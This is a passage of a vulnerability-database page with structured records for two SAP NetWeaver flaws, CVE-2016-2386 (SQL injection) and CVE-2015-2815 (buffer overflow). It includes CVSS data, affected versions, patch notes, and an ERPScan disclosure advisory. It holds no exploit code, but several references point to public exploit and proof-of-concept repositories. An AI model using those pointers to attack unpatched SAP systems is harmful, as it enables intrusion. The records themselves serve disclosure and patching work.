"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0118",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "j2ee engine 7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2386"
}
]
},
"cve": "CVE-2016-2386",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-2386",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-2386",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-2386",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-296",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2016-2386",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "VULMON",
"id": "CVE-2016-2386"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39840",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2386"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-2386",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "39840",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "43495",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "137129",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296",
"trust": 0.6
},
{
"db": "BID",
"id": "83222",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-2386",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"id": "VAR-201602-0118",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-26T23:01:19.730000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Notes February 2016 - Review (2101079)",
"trust": 0.8,
"url": "http://scn.sap.com/community/security/blog/2016/02/11/sap-security-notes-february-2016--review?tb_iframe=true\u0026width=921.6\u0026height=921.6"
},
{
"title": "SAP NetWeaver J2EE Engine UDDI server SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60232"
},
{
"title": "https://github.com/murataydemir/CVE-2016-2386",
"trust": 0.1,
"url": "https://github.com/murataydemir/cve-2016-2386 "
},
{
"title": "SAP_exploit",
"trust": 0.1,
"url": "https://github.com/vah13/sap_exploit "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/lnick2023/nicenice "
},
{
"title": "Known Exploited Vulnerabilities Detector",
"trust": 0.1,
"url": "https://github.com/ostorlab/kev "
},
{
"title": "Awesome CVE PoC",
"trust": 0.1,
"url": "https://github.com/qazbnm456/awesome-cve-poc "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/06/15/microsoft_patch_tuesday/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "NVD",
"id": "CVE-2016-2386"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/39840/"
},
{
"trust": 1.8,
"url": "https://github.com/vah13/sap_exploit"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2016/may/56"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/137129/sap-netweaver-as-java-7.5-sql-injection.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/43495/"
},
{
"trust": 1.7,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 1.7,
"url": "https://erpscan.io/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2386"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2386"
},
{
"trust": 0.8,
"url": "https://erpscan.com/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://github.com/murataydemir/cve-2016-2386"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/83222"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-02-16T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"date": "2016-02-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"date": "2016-02-16T15:59:00.133000",
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"date": "2016-02-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-20T00:00:00",
"db": "VULMON",
"id": "CVE-2016-2386"
},
{
"date": "2016-02-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001461"
},
{
"date": "2021-04-20T19:30:51.777000",
"db": "NVD",
"id": "CVE-2016-2386"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver J2EE Engine of UDDI On the server SQL Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001461"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-296"
}
],
"trust": 0.6
}
}
var-201504-0227
Vulnerability from variot
Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369. SAP Kernel of NetWeaver Dispatcher of C_SAPGPARAM The function contains a buffer overflow vulnerability. SAP NetWeaver is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition. ERPSCAN Research Advisory [ERPSCAN-15-003] SAP NetWeaver Dispatcher Buffer Overflow - RCE, DoS
Application: SAP NetWeaver Dispatcher Versions Affected: SAP NetWeaver Dispatcher, probably others Vendor URL: http://SAP.com Bugs: RCE Sent: 25.08.14 Reported: 25.08.14 Vendor response: 25.08.14 Date of Public Advisory: 15.02.2015 Reference: SAP Security Note 2063369 Author: George Nosenko (ERPScan)
Description
-
ADVISORY INFORMATION Title: SAP NetWeaver Dispatcher Advisory ID: [ERPSCAN-05-003] Risk: Hight Advisory URL: http://erpscan.com/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/ Date published: 18.06.2015 Vendors contacted: SAP
-
VULNERABILITY INFORMATION Class: Buffer overflow [CWE-119], [CWE-20] Impact: Allows an unauthorized attacker to execute remote code Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2015-2815
-
It can also lead to denial of service.
-
VULNERABLE PACKAGES • SAP KERNEL 7.00 32BIT, disp+work.exe (7000.52.12.34966) • SAP KERNEL 7.40 64BIT, disp+work.exe (7400.12.21.30308) Other versions are probably affected too, but they were not checked.
-
SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2063369.
-
AUTHOR George Nosenko (ERPScan)
-
It can also lead to denial of service.
-
REPORT TIMELINE Sent: 25.08.2014 Reported: 25.08.2014 Vendor response: 26.08.2014 Date of Public Advisory: 18.06.2015
-
REFERENCES http://erpscan.com/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/
-
ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.
-
ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com -- https://www.linkedin.com/company/2217474?trk=ppro_cprof https://twitter.com/erpscan
e-mail: d.maenkova@erpscan.com d.maenkova@erpscan.com
address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
phone: 650.798.5255
erpscan.com http://erpscan.com
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201504-0227",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "dispatcher 7000.52.12.34966 (sap kernel 7.00)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "dispatcher 7400.12.21.30308 (sap kernel 7.40)"
}
],
"sources": [
{
"db": "BID",
"id": "73897"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2015-2815"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "George Nosenko (ERPScan)",
"sources": [
{
"db": "BID",
"id": "73897"
}
],
"trust": 0.3
},
"cve": "CVE-2015-2815",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2015-2815",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2015-2815",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201504-028",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-002061"
},
{
"db": "NVD",
"id": "CVE-2015-2815"
},
{
"db": "CNNVD",
"id": "CNNVD-201504-028"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in the C_SAPGPARAM function in the NetWeaver Dispatcher in SAP KERNEL 7.00 (7000.52.12.34966) and 7.40 (7400.12.21.30308) allows remote authenticated users to cause a denial of service or possibly execute arbitrary code via unspecified vectors, aka SAP Security Note 2063369. SAP Kernel of NetWeaver Dispatcher of C_SAPGPARAM The function contains a buffer overflow vulnerability. SAP NetWeaver is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. \nAttackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition. ERPSCAN Research Advisory [ERPSCAN-15-003] SAP NetWeaver Dispatcher \nBuffer Overflow - RCE, DoS\n\nApplication: SAP NetWeaver Dispatcher\nVersions Affected: SAP NetWeaver Dispatcher, probably others\nVendor URL: http://SAP.com\nBugs: RCE\nSent: 25.08.14\nReported: 25.08.14\nVendor response: 25.08.14\nDate of Public Advisory: 15.02.2015\nReference: SAP Security Note 2063369\nAuthor: George Nosenko (ERPScan)\n\n\nDescription\n\n\n1. ADVISORY INFORMATION\nTitle: SAP NetWeaver Dispatcher\nAdvisory ID: [ERPSCAN-05-003]\nRisk: Hight\nAdvisory URL: \nhttp://erpscan.com/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/\nDate published: 18.06.2015\nVendors contacted: SAP\n\n\n2. VULNERABILITY INFORMATION\nClass: Buffer overflow [CWE-119], [CWE-20]\nImpact: Allows an unauthorized attacker to execute remote code\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2015-2815\n\n\n3. It can also lead to denial of \nservice. \n\n\n4. VULNERABLE PACKAGES\n\u2022 SAP KERNEL 7.00 32BIT, disp+work.exe (7000.52.12.34966)\n\u2022 SAP KERNEL 7.40 64BIT, disp+work.exe (7400.12.21.30308)\nOther versions are probably affected too, but they were not checked. \n\n\n5. SOLUTIONS AND WORKAROUNDS\nTo correct this vulnerability, install SAP Security Note 2063369. \n\n\n6. AUTHOR\nGeorge Nosenko (ERPScan)\n\n\n7. It can also lead to denial of \nservice. \n\n\n8. REPORT TIMELINE\nSent: 25.08.2014\nReported: 25.08.2014\nVendor response: 26.08.2014\nDate of Public Advisory: 18.06.2015\n\n\n9. REFERENCES\nhttp://erpscan.com/advisories/erpscan-15-003-sapkernel-c_sapgparam-rce-dos/\n\n\n10. ABOUT ERPScan Research\nThe company\u2019s expertise is based on the research subdivision of ERPScan, \nwhich is engaged in vulnerability research and analysis of critical \nenterprise applications. It has achieved multiple acknowledgments from \nthe largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, \nHP for discovering more than 400 vulnerabilities in their solutions (200 \nof them just in SAP!). \nERPScan researchers are proud to have exposed new types of \nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated \nfor the best server-side vulnerability at BlackHat 2013. \nERPScan experts have been invited to speak, present, and train at 60+ \nprime international security conferences in 25+ countries across the \ncontinents. These include BlackHat, RSA, HITB, and private SAP trainings \nin several Fortune 2000 companies. \nERPScan researchers lead the project EAS-SEC, which is focused on \nenterprise application security research and awareness. They have \npublished 3 exhaustive annual award-winning surveys about SAP security. \nERPScan experts have been interviewed by leading media resources and \nfeatured in specialized info-sec publications worldwide. These include \nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, \nHeise, and Chinabyte, to name a few. \nWe have highly qualified experts in staff with experience in many \ndifferent fields of security, from web applications and mobile/embedded \nto reverse engineering and ICS/SCADA systems, accumulating their \nexperience to conduct the best SAP security research. \n\n\n11. ABOUT ERPScan\nERPScan is one of the most respected and credible Business Application \nSecurity providers. Founded in 2010, the company operates globally. \nNamed an Emerging vendor in Security by CRN and distinguished by more \nthan 25 other awards, ERPScan is the leading SAP SE partner in \ndiscovering and resolving security vulnerabilities. ERPScan consultants \nwork with SAP SE in Walldorf to improve the security of their latest \nsolutions. \nERPScan\u2019s primary mission is to close the gap between technical and \nbusiness security. We provide solutions to secure ERP systems and \nbusiness-critical applications from both cyber attacks and internal \nfraud. Our clients are usually large enterprises, Fortune 2000 \ncompanies, and managed service providers whose requirements are to \nactively monitor and manage the security of vast SAP landscapes on a \nglobal scale. \nOur flagship product is ERPScan Security Monitoring Suite for SAP. This \nmulti award-winning innovative software is the only solution on the \nmarket certified by SAP SE covering all tiers of SAP security: \nvulnerability assessment, source code review, and Segregation of Duties. \nThe largest companies from diverse industries like oil and gas, banking, \nretail, even nuclear power installations as well as consulting companies \nhave successfully deployed the software. ERPScan Security Monitoring \nSuite for SAP is specifically designed for enterprises to continuously \nmonitor changes in multiple SAP systems. It generates and analyzes \ntrends in user friendly 